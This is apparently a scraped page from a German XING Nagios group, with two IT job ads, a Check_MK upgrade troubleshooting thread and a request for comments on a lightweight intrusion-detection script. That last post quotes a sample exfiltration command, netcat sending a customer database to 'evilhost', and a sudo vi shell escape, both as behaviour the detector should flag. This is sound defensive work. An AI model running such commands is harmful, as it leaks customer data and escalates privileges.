Probleme beim Einloggen
Nhat Anh Tu Lam IT-Administrator in Darmstadt gesucht
Sehr geehrte Damen und Herren,
wir sind auf der Suche nach einem IT-Administrator(m/w) in Darmstadt in Festanstellung
AUFGABEN
• Laufende Administration und Support der Satellitensysteme die in der Retail Cloud betrieben werden.
• Installation und Konfiguration von Servern
• Installation und Konfiguration von Oracle Datenbanken
• Laufendes Monitoring der Infrastruktur und Anwendungen via Nagios
• Backup und Recovery der Datenbanken
• Durchführung von Release und Upgrades incl. Test und Pilotierung
• Konfiguration Firewalls
• Testunterstützung/ Sicherstellung der ASP spezifischen Anforderung bei Konzeption neuer Releases.
• Dokumentation Prozesse, Applikationen und Infrastruktur (ITIL V3)
ANFORDERUNGEN
• Technische Qualifikation: Oracle, Windows, Citrix und Linux.
• Netzwerkkenntnisse LAN/WAN, VPN, Firewall, Sicherheitssoftware
• Kenntnisse der rechtlichen und betrieblichen Sicherheitsbestimmungen
• Selbstständig und eigenverantwortliches Arbeiten
• Einschätzung der Auswirkungen und Prioritäten bei Störungsfällen
• Konzeptionelle und analytische Fähigkeiten
GUT ZU WISSEN
• BEGINN: ab sofort
• DAUER: unbefristet
• AUSLASTUNG: 40 Stunden pro Woche
• EINSATZORT: Darmstadt
• VERTRAGSVERHÄLTNIS: Festanstellung
Interessiert? Dann senden Sie uns bitte Ihren aktuellen Lebenslauf sowie Ihre Verfügbarkeit und Ihre Gehaltsvorstellung zu.
-----
Nhat Anh Tu Lam
Recruiter
E-Mail: anhtu.lam@it-profiler.com
-----
Herzliche Grüße aus Darmstadt
Ihr Profiler-Team
Thorben Hummel Netlution: _Linux Consultant - _Dein vertrauter Partner!
Du musst kein Pinguin-Liebhaber sein. Symbolisch ist Dir der Pinguin aber sehr nahe und in Deiner täglichen Arbeit sowas wie ein vertrauter Partner. Was wir sagen wollen: LINUX ist Dein Ding!
Zur Erweiterung unseres Netlution-Teams suchen wir zum nächstmöglichen Zeitpunkt einen:
Linux / Nagios Consultant (m/w)
Alle weiteren Informationen entnimmst Du bitte unserer Stellenbeschreibung.
Wir freuen uns auf Deine Bewerbung!
Nur für XING Mitglieder sichtbar Check MK Update von 1.2.8.p14 auf 1.4.0.p10
Hallo Gruppe,
mit einem Update auf die Version 1.4.0.p10 habe ich mir einige schwierigkeiten eingekauft.
Für die Version 1.2.8.p14 wurden von einer Fremdfirma Extension Packages / Check Plugins geschrieben die mit der neuen Version nicht mehr funktionieren.
Was ist das Problem:
In den diversen Scripten werden Variablen verwendet die es so nicht mehr gibt, daher kommt es zum Crash.
Z.B.: "defaults.var_dir".
Was ich bisher herausgefunden habe: In V. 1.2.8.x gab es eine Textdatei mit dem Namen "defaults". in dieser Datei wurden von WATO Variablen angelegt. Die besagten Scripte verweisen an vielen Stellen auf die Datei mit dem entsprechendem Variablen-Namen.
In der V. 1.4.0.x gibt es diese Datei jedoch nicht.
Meine Frage lautet jetzt: "Wo finde ich bzw. konfiguriere ich bzw. welche Variablen kennt Check MK? Damit ich die Scripte entsprechend anpassen kann.
Ich muß dazu sagen, das ich mich als fortgeschrittenen Anfänger bezeichne, da ich mich mit Check MK erst seit wenigen Wochen beschäftige.
Über jeden guten Hinweis würde ich mich freuen.
Besten Dank im voraus!
+2 weitere Kommentare
Letzter Kommentar:
Nur für XING Mitglieder sichtbar
Hallo Guido,
wir hatten in unserer Umgebung ebenfalls Probleme nach dem Update auf 1.4. In unserem Fall konnten einige selbst geschriebene Checks ihre benötigten Python Module nicht mehr finden, die über die OS Paketverwaltung installiert worden. Hier scheint Check_MK nun einen eigenen Ansatz implementiert zu haben und die benötigten Module selbst mitzubringen.
Des Problems Lösung war das Ändern der Shebang in den in Python geschriebenen checks von
#!/usr/bin/python
auf
#!/usr/bin/env python
Damit wurde dann das von check_mk gelieferte Python genutzt.
OMD[ose]:~$ which python
/omd/sites/ose/bin/python
Sofern es sich um in Python geschriebene Checks handelt wäre dies ein erster Ansatz.
Zusammen mit dem von Markus erwähnten environment File ließen sich dann auch die definierten Variablen aus Python heraus nutzen.
OMD[ose]:~$ cat ~/etc/environment
# Custom environment variables
#
# Here you can set environment variables. These will
# be set in interactive mode when logging in as site
# user and also when starting the OMD processes with
# omd start.
#
# This file has shell syntax, but without 'export'.
# Better use quotes if your values contain spaces.
#
# Example:
#
# FOO="bar"
# FOO2="With some spaces"
#
BLA=BLUBB
OMD[ose]:~$ /usr/bin/env python
Python 2.7.13 (default, May 30 2017, 20:07:52)
[GCC 6.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import os
print os.environ['BLA']
BLUBB
Best Grüße,
Sebastian
Bernhard Hörl Custom Nagios NCPA Plugin: Remote Ping
Stephan Schmieder request for comments: check_siem
Hallo Gruppe,
ich schreibe derzeit ein lsof-basiertes HIDS für CheckMK/Nagios/Cron mit Zielsetzung "mal eben flächendeckend" eine primitive/leichtgewichtige SIEM-Infrastruktur ausrollen zu können.
Der Ansatz geht in Richtung ps/netstat/filehandle-Überwachung - erkennt folglich auch Anomalien, die ohne Exploit oder Dateiänderungen daherkommen.
Sowas wie "SSH-Login von untypischer IP" (shoulder-surfed Passwort),
":!bash" Escape aus einem "sudo vi" (statt visudo) heraus, oder
"netcat evilhost 666 < customerdb.ora".
Ich freue mich auf jegliches Feedback zu Konzept und Implementierung.
Bislang nur zwei Wochen auf Fedora, SLES, Ubuntu, Debian und OpenBSD getestet. Mehr OSe in Arbeit.

Moderatoren

Infos zu den Moderatoren

Über die Gruppe "Nagios"

  • Gegründet: 22.07.2008
  • Mitglieder: 3.532
  • Sichtbarkeit: offen
  • Beiträge: 400
  • Kommentare: 603